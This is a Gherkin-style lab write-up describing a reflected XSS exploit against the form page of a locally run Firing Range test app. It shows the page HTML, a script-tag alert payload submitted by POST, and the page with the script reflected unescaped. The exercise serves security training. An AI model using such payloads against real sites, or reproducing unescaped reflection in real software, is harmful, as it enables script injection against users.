# language: en

Feature: Reflected XSS HTML - Escaping and filtering - Form
  From the Firing Range system

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 18.06.0-ce, build 26399
    And also using Safari Version 11.1.2 (13605.3.8)
    And installed firing-range locally
    Given the following scenario
    """
    URL: http://localhost:8080/reflected/parameter/form
    Message:  This XSS, in the BODY, only triggers on a POST. The page shows
    the HTML FORM needed to trigger it.
    Details:
      - Reflected XSS HTML Parameter-Body page
      - The page shows an 'Previous submit:' on the top
      - An input text box and submit button
    Objective: Perform an reflected xss with the form of the HTML page
    """
    Scenario: XSS attempt
    Given the following HTML code for the page
    """
    <html>
      <body>
        <p>
          Previous submit:
        </p>

        <form method="POST">
          <input type="text" name="q">
          <input type="submit">
        </form>
      </body>
    </html>
    """
    When I see the form noticed that the POST method has no restrictions
    And  I fill the input parameter with the following
    """
    <script>alert(window.location.pathname)</script>
    """
    Then the page was reloaded and the popup appeared with the pathname
    """
    /reflected/parameter/form
    """
    And the code was added to the html code of the page
    """
    <html>
      <body>
        <p>
          Previous submit: <script>alert(window.location.pathname)</script>
        </p>

        <form method="POST">
          <input type="text" name="q">
          <input type="submit">
        </form>
      </body>
    </html>
    """
